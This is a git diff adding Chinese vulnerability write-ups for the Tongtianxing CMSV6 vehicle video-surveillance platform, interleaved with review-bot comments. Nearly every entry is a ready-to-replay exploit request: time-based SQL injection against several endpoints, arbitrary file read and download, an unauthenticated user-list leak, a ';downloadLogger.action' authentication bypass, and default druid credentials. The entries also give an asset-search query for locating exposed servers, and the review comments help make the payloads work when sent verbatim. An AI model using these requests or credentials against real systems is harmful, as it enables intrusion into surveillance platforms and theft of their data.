\ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台StandardLoginAction_getAllUser存在信息泄露漏洞.md b/通天星CMSV6车载视频监控平台StandardLoginAction_getAllUser存在信息泄露漏洞.md new file mode 100644 index 0000000..30763fd --- /dev/null 
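Review bot: the injection point is the `jsession` query parameter (`jsession=2C0EB587191F68C441F128919862AC11%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(3)))DpjE)--%20gtMe`), but the text never names it, and the second block repeats the same path without a payload with no explanation of what it demonstrates (presumably the baseline response); add one sentence for each. The `jsession` value and `Cookie: JSESSIONID=8D45F4B70B77ED88CCD43B3050A2934F` come from one capture and should be placeholders. The 简介 gives the impact but no version or fix (parameterise the session lookup).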
+++ b/通天星CMSV6车载视频监控平台StandardLoginAction_getAllUser存在信息泄露漏洞.md @@ -0,0 +1,35 @@ +# 通天星CMSV6车载视频监控平台 StandardLoginAction_getAllUser存在信息泄露漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台 StandardLoginAction_getAllUser存在信息泄露漏洞 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/qeBqs1a9Qk8ZCyGE/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-679029.png) + +# 四、漏洞复现 +```plain +POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-type: application/x-www-form-urlencoded +Content-Length: 9 +Connection: close + +json=null +``` + +![1708930197713-09611dea-bacf-4aef-9cb2-852e43d9b0d6.png](./img/qeBqs1a9Qk8ZCyGE/1708930197713-09611dea-bacf-4aef-9cb2-852e43d9b0d6-824541.png) + +![1708930228198-70bb271e-273a-4e3f-aea0-43c58e85a92d.png](./img/qeBqs1a9Qk8ZCyGE/1708930228198-70bb271e-273a-4e3f-aea0-43c58e85a92d-631853.png) + + + +> 更新: 2024-12-28 13:05:36 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台StandardReportMediaAction_getImage存在任意文件读取漏洞.md b/通天星CMSV6车载视频监控平台StandardReportMediaAction_getImage存在任意文件读取漏洞.md new file mode 100644 index 0000000..27474fe --- /dev/null +++ b/通天星CMSV6车载视频监控平台StandardReportMediaAction_getImage存在任意文件读取漏洞.md 
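Review bot: the getAllUser entry says only 存在信息泄露漏洞 and the body is `json=null`; say what `/808gps/StandardLoginAction_getAllUser.action` returns (usernames only, or also password hashes and roles), because that is what the two screenshots presumably show and what the reader needs to rate impact. The request carries no session cookie, which is the actual pre-auth claim and should be stated in words rather than left implicit.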
@@ -0,0 +1,33 @@ +# 通天星CMSV6车载视频监控平台 StandardReportMediaAction_getImage存在任意文件读取漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台 StandardReportMediaAction_getImage存在信息泄露漏洞。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/Qz7AF5mVWHbgfj7L/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-213540.png) + +# 四、漏洞复现 +```plain +GET /808gps/StandardReportMediaAction_getImage.action?filePath=C://Windows//win.ini&fileOffset=1&fileSize=100 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=82D471F9BEF54995F73170C5647FAF54 +Upgrade-Insecure-Requests: 1 +``` + +![1708916552974-e0e3aa2a-cfee-488d-9cff-878b9b5c550f.png](./img/Qz7AF5mVWHbgfj7L/1708916552974-e0e3aa2a-cfee-488d-9cff-878b9b5c550f-986675.png)[通天星-CMSV6-standardreportmediaaction-getimage-文件读取.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1735362336433-896c3fbf-7ba6-4420-8882-397fee7aa98b.yaml) + + + +> 更新: 2024-12-28 13:05:36 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台complex存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台complex存在SQL注入漏洞.md new file mode 100644 index 0000000..fe8404a --- /dev/null +++ b/通天星CMSV6车载视频监控平台complex存在SQL注入漏洞.md 
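Review bot: the title and filename say 任意文件读取 but the last sentence of the 漏洞简介 says `StandardReportMediaAction_getImage存在信息泄露漏洞`; make them agree. The repro shows only the Windows path `filePath=C://Windows//win.ini` with `fileOffset=1&fileSize=100`; say whether `fileSize` bounds how much can be read per request and whether an absolute path works on a Linux install, otherwise the reader has to rediscover the parameter semantics.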
@@ -0,0 +1,49 @@ +# 通天星CMSV6车载视频监控平台 complex存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台complex存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/vcXGl3_yX1OjLlX9/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-913587.png) + +# 四、漏洞复现 +```rust +POST /dynamic_monitoring_ledger/complex;downloadLogger.action HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 5 + +statisticTime=1%27+AND+%28SELECT+8849+FROM+%28SELECT%28SLEEP%285%29%29%29uSno%29+AND+%27OOJG%27%3D%27OOJG&contentMeasures=1&companyId=1 +``` + +![1717267316081-a29c4ffc-20c3-43e8-a615-d1f33ea97d0b.png](./img/vcXGl3_yX1OjLlX9/1717267316081-a29c4ffc-20c3-43e8-a615-d1f33ea97d0b-006819.png) + +```rust +POST /dynamic_monitoring_ledger/complex;downloadLogger.action HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 5 + +statisticTime=1&contentMeasures=1&companyId=1 +``` + +![1717267338409-027e747b-c9ec-475a-9d03-b3903e0b0b5e.png](./img/vcXGl3_yX1OjLlX9/1717267338409-027e747b-c9ec-475a-9d03-b3903e0b0b5e-870824.png) + + + +> 更新: 2024-12-28 13:05:34 +> 原文: \ No newline at end of file 
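Review bot: `Content-Length: 5` in both requests of the complex entry does not match the bodies (`statisticTime=1%27+AND+...&contentMeasures=1&companyId=1` is far longer), so replaying the request verbatim sends a truncated body and the injection will not fire; fix the length or drop the header and let the client compute it. Minor: the fences are tagged `rust` for raw HTTP requests (use `plain` as the other entries do), and `X-Forwarded-For: 127.0.0.1` appears without explanation, so say whether it is required.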
diff --git a/通天星CMSV6车载视频监控平台disable存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台disable存在SQL注入漏洞.md new file mode 100644 index 0000000..66e92c1 --- /dev/null +++ b/通天星CMSV6车载视频监控平台disable存在SQL注入漏洞.md @@ -0,0 +1,41 @@ +# 通天星CMSV6车载视频监控平台 disable存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台disable存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/SOwkwqowLJh9AbQ0/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-030024.png) + +# 四、漏洞复现 +```rust +GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +``` + +![1717265746631-43d0a11b-a656-4117-93fa-af88370c0cf8.png](./img/SOwkwqowLJh9AbQ0/1717265746631-43d0a11b-a656-4117-93fa-af88370c0cf8-182905.png) + +```rust +GET /edu_security_officer/disable;downloadLogger.action?ids=1 HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +``` + +![1717265761114-f1ef9a5c-996b-41d4-8ebf-4a5620210973.png](./img/SOwkwqowLJh9AbQ0/1717265761114-f1ef9a5c-996b-41d4-8ebf-4a5620210973-835467.png) + + + +> 更新: 2024-12-28 13:05:34 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台dismiss_disable存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台dismiss_disable存在SQL注入漏洞.md new file mode 100644 index 0000000..7bcbe90 --- /dev/null 
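Review bot: every request in the disable entry and its siblings appends `;downloadLogger.action` to the real path (`/edu_security_officer/disable;downloadLogger.action`), but only the druid entry explains that this suffix bypasses authentication; add that one-line explanation here, or a cross-reference, so the payload is understandable on its own. Also the first request has an empty `Host:` while the baseline has `Host: 192.168.31.228`; use the same placeholder in both.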
+++ b/通天星CMSV6车载视频监控平台dismiss_disable存在SQL注入漏洞.md @@ -0,0 +1,41 @@ +# 通天星CMSV6车载视频监控平台 dismiss_disable存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台dismiss_disable存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/RD1frkQj3EIWkVmf/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-909326.png) + +# 四、漏洞复现 +```rust +GET /edu_security_officer/dismiss_disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +``` + +![1717265859414-4b868741-d8fe-46ff-b4d9-c0df4e83e0b0.png](./img/RD1frkQj3EIWkVmf/1717265859414-4b868741-d8fe-46ff-b4d9-c0df4e83e0b0-924563.png) + +```rust +GET /edu_security_officer/dismiss_disable;downloadLogger.action?ids= HTTP/1.1 +Host: 192.168.31.228 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Connection: close +X-Forwarded-For: 127.0.0.1 +Accept-Encoding: gzip, deflate +``` + +![1717265872402-6e02a4d2-5185-44c1-b57c-3a3446189c6c.png](./img/RD1frkQj3EIWkVmf/1717265872402-6e02a4d2-5185-44c1-b57c-3a3446189c6c-792294.png) + + + +> 更新: 2024-12-28 13:05:33 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台downloadLogger任意文件下载.md b/通天星CMSV6车载视频监控平台downloadLogger任意文件下载.md new file mode 100644 index 0000000..17a5b22 --- /dev/null +++ b/通天星CMSV6车载视频监控平台downloadLogger任意文件下载.md 
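Review bot: the baseline request in the dismiss_disable entry uses `ids=` (empty) while the payload request uses `ids=1+AND+...`, so the two responses are not comparable; the baseline should be `ids=1` as in the `disable` entry, otherwise a difference in response could be caused by the missing id rather than by the injection.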
@@ -0,0 +1,37 @@ +# 通天星CMSV6车载视频监控平台 downloadLogger任意文件下载 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台存在任意文件下载漏洞,攻击者可通过此漏洞下载敏感文件信息,获取数据库账号密码,从而为下一步攻击做准备。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/X3Ip5GtyEvMvrLCS/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-243948.png) + +# 四、漏洞复现 +```plain +POST /808gps/logger/downloadLogger.action HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +Upgrade-Insecure-Requests: 1 +sec-ch-ua-platform: "Windows" +sec-ch-ua: "Google Chrome";v="113", "Chromium";v="113", "Not=A?Brand";v="24" +sec-ch-ua-mobile: ?0 +Content-Type: application/x-www-form-urlencoded + +fileName=C:\windows\win.ini +``` + +![1700148030526-73b31a17-3065-420a-ba37-b0399d1f568a.png](./img/X3Ip5GtyEvMvrLCS/1700148030526-73b31a17-3065-420a-ba37-b0399d1f568a-272668.png) + + + +> 更新: 2024-12-28 13:05:35 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台druid存在默认口令漏洞.md b/通天星CMSV6车载视频监控平台druid存在默认口令漏洞.md new file mode 100644 index 0000000..777710e --- /dev/null +++ b/通天星CMSV6车载视频监控平台druid存在默认口令漏洞.md 
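Review bot: the 漏洞简介 of the downloadLogger entry claims the bug yields 数据库账号密码, but the only request shown reads `fileName=C:\windows\win.ini`; either show the configuration file path that actually holds the credentials or soften the claim to arbitrary file read. The POST also has `Content-Type: application/x-www-form-urlencoded` with no `Content-Length`, which some servers reject with 411; add it.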
@@ -0,0 +1,41 @@ +# 通天星CMSV6车载视频监控平台 druid存在默认口令漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台 druid存在默认口令漏洞。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/99EBhY1oQ-mjYZgI/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-754278.png) + +# 四、漏洞复现 +`;downloadLogger.action`绕过鉴权 + +```plain +POST /druid/submitLogin HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/plain, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 42 +Connection: close +Cookie: JSESSIONID=4F7D8A071EAC19E6196D1775D84D2F8D + +loginUsername=ttx&loginPassword=ttx123456. +``` + +![1711464615359-a39000d2-d25e-428f-8c8d-70b3f0cea36a.png](./img/99EBhY1oQ-mjYZgI/1711464615359-a39000d2-d25e-428f-8c8d-70b3f0cea36a-366787.png) + +![1711464632801-68cfb113-488a-48b1-8233-3f588fd8d554.png](./img/99EBhY1oQ-mjYZgI/1711464632801-68cfb113-488a-48b1-8233-3f588fd8d554-615129.png) + + + +> 更新: 2024-12-28 13:05:36 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台edu_class_delete存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台edu_class_delete存在SQL注入漏洞.md new file mode 100644 index 0000000..4169476 --- /dev/null +++ b/通天星CMSV6车载视频监控平台edu_class_delete存在SQL注入漏洞.md 
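Review bot: the line `;downloadLogger.action`绕过鉴权 says the suffix is needed, but the request that follows is `POST /druid/submitLogin` with no suffix; either show the bypassed URL or remove the note. The credentials `ttx` / `ttx123456.` are presented without the expected response body for a successful `submitLogin`, so add it and say which druid pages (session or SQL monitor) become reachable afterwards, so the screenshots are not the only evidence.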
@@ -0,0 +1,44 @@ +# 通天星CMSV6车载视频监控平台 edu_class/delete存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台edu_class/delete存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/ZfRbEUS-yZR57cAu/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-994080.png) + +# 四、漏洞复现 +```java +GET /edu_class/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: JSESSIONID=58586A7CBD64C381945F9AAACFDF7C40 +Connection: close +Content-Length: 0 +``` + +![1712849698475-ee1f69ae-46f8-4eda-ba76-646d4b41515c.png](./img/ZfRbEUS-yZR57cAu/1712849698475-ee1f69ae-46f8-4eda-ba76-646d4b41515c-605340.png) + +sqlmap + +```java +/edu_class/delete.do;downloadLogger.action?ids=1)&loadAll=1 +``` + +![1712849859585-314f1ccf-6a3b-4b2e-9b37-c85b79daf608.png](./img/ZfRbEUS-yZR57cAu/1712849859585-314f1ccf-6a3b-4b2e-9b37-c85b79daf608-134757.png) + + + +> 更新: 2024-12-28 13:05:35 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台edu_course_publish_revoke存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台edu_course_publish_revoke存在SQL注入漏洞.md new file mode 100644 index 0000000..63d6f18 --- /dev/null +++ b/通天星CMSV6车载视频监控平台edu_course_publish_revoke存在SQL注入漏洞.md 
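Review bot: the sqlmap target `/edu_class/delete.do;downloadLogger.action?ids=1)&loadAll=1` keeps the unbalanced `)` from the manual payload `ids=1)+AND+(SELECT ...)--+`, which is intentional (the parameter lands inside parentheses) but reads like a typo; say so explicitly. Also give the actual sqlmap command line and options rather than just the URL, since whether sqlmap finds this context depends on `--prefix`/`--suffix` and the technique flags used.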
@@ -0,0 +1,44 @@ +# 通天星CMSV6车载视频监控平台 edu_course/publish_revoke存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台edu_course/publish_revoke存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/LzwGPnC6BmZGEgDF/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-051441.png) + +# 四、漏洞复现 +```java +GET /edu_course/publish_revoke;downloadLogger.action?id=(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&value=1 HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: JSESSIONID=58586A7CBD64C381945F9AAACFDF7C40 +Connection: close +Content-Length: 0 +``` + +![1712850115886-4c901b40-1d44-4be6-b87f-d1fe32e3a315.png](./img/LzwGPnC6BmZGEgDF/1712850115886-4c901b40-1d44-4be6-b87f-d1fe32e3a315-422299.png) + +sqlmap + +```java +/edu_course/publish_revoke;downloadLogger.action?id=1&value=1 +``` + +![1712850269122-4dff0f16-01db-4ca5-9347-1a08da7752b8.png](./img/LzwGPnC6BmZGEgDF/1712850269122-4dff0f16-01db-4ca5-9347-1a08da7752b8-990604.png) + + + +> 更新: 2024-12-28 13:05:35 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台edu_plan_publish_revoke存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台edu_plan_publish_revoke存在SQL注入漏洞.md new file mode 100644 index 0000000..b7c6e63 --- /dev/null +++ b/通天星CMSV6车载视频监控平台edu_plan_publish_revoke存在SQL注入漏洞.md 
@@ -0,0 +1,44 @@ +# 通天星CMSV6车载视频监控平台 edu_plan/publish_revoke存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台edu_plan/publish_revoke存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/9E0H1R1a5szPPVSd/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-322983.png) + +# 四、漏洞复现 +```java +GET /edu_plan/publish_revoke;downloadLogger.action?id=(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&value=1 HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: JSESSIONID=58586A7CBD64C381945F9AAACFDF7C40 +Connection: close +Content-Length: 0 +``` + +![1712850376800-629599b5-79ae-4705-be10-63f45108cdf7.png](./img/9E0H1R1a5szPPVSd/1712850376800-629599b5-79ae-4705-be10-63f45108cdf7-900919.png) + +sqlmap + +```java +/edu_plan/publish_revoke;downloadLogger.action?id=1&value=1 +``` + +![1712850484377-d0dfc585-b34b-4487-af07-28d3d4d80f8a.png](./img/9E0H1R1a5szPPVSd/1712850484377-d0dfc585-b34b-4487-af07-28d3d4d80f8a-063750.png) + + + +> 更新: 2024-12-28 13:05:34 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台getAlarmAppealByGuid存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台getAlarmAppealByGuid存在SQL注入漏洞.md new file mode 100644 index 0000000..a8dfb9e --- /dev/null +++ b/通天星CMSV6车载视频监控平台getAlarmAppealByGuid存在SQL注入漏洞.md 
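Review bot: the edu_plan/publish_revoke entry is identical to the edu_course/publish_revoke one except for the path, down to the same sqlmap token `5394`/`tdpw` and the same `JSESSIONID`; either merge them into one entry listing both endpoints or state that they inject through the same `id` parameter with the same payload, so the reader knows one test procedure covers both.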
